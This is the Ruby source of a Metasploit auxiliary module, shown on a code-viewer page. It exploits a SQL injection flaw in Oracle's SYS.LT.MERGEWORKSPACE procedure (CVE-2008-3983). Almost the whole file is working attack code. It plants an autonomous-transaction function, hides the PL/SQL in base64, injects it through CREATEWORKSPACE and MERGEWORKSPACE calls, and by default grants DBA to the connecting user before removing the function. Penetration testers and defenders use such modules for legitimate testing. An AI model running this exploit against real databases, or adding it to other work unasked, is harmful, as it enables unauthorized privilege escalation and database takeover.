Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::ORACLE
8
9
def initialize(info = {})
10
super(
11
update_info(
12
info,
13
'Name' => 'Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE',
14
'Description' => %q{
15
This module exploits a sql injection flaw in the MERGEWORKSPACE
16
procedure of the PL/SQL package SYS.LT. Any user with execute
17
privilege on the vulnerable package can exploit this vulnerability.
18
},
19
'Author' => [ 'CG' ],
20
'License' => MSF_LICENSE,
21
'References' => [
22
[ 'CVE', '2008-3983'],
23
[ 'OSVDB', '49325'],
24
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ],
25
[ 'URL', 'http://www.dsecrg.com/pages/expl/show.php?id=23' ]
26
27
],
28
'DisclosureDate' => '2008-10-22',
29
'Notes' => {
30
'Stability' => [CRASH_SAFE],
31
'SideEffects' => [IOC_IN_LOGS],
32
'Reliability' => []
33
}
34
)
35
)
36
37
register_options(
38
[
39
OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]),
40
]
41
)
42
end
43
44
def run
45
return if !check_dependencies
46
47
name = Rex::Text.rand_text_alpha_upper(1..10)
48
rand1 = Rex::Text.rand_text_alpha_upper(1..10)
49
rand2 = Rex::Text.rand_text_alpha_upper(1..10)
50
rand3 = Rex::Text.rand_text_alpha_upper(1..10)
51
cruft = Rex::Text.rand_text_alpha_upper(1)
52
53
function = "
54
CREATE OR REPLACE FUNCTION #{cruft}
55
RETURN VARCHAR2 AUTHID CURRENT_USER
56
AS
57
PRAGMA AUTONOMOUS_TRANSACTION;
58
BEGIN
59
EXECUTE IMMEDIATE '#{datastore['SQL']}';
60
COMMIT;
61
RETURN '#{cruft}';
62
END;"
63
64
package1 = %|
65
BEGIN
66
SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');
67
END;
68
|
69
70
package2 = %|
71
BEGIN
72
SYS.LT.MERGEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');
73
END;
74
|
75
76
uno = Rex::Text.encode_base64(function)
77
dos = Rex::Text.encode_base64(package1)
78
tres = Rex::Text.encode_base64(package2)
79
80
sql = %|
81
DECLARE
82
#{rand1} VARCHAR2(32767);
83
#{rand2} VARCHAR2(32767);
84
#{rand3} VARCHAR2(32767);
85
BEGIN
86
#{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));
87
EXECUTE IMMEDIATE #{rand1};
88
#{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));
89
EXECUTE IMMEDIATE #{rand2};
90
#{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}')));
91
EXECUTE IMMEDIATE #{rand3};
92
END;
93
|
94
95
clean = "DROP FUNCTION #{cruft}"
96
97
# Try first, if it's good.. keep doing the dance.
98
print_status('Attempting sql injection on SYS.LT.MERGEWORKSPACE...')
99
begin
100
prepare_exec(sql)
101
rescue StandardError
102
return
103
end
104
105
print_status("Removing function '#{cruft}'...")
106
prepare_exec(clean)
107
end
108
end
109
110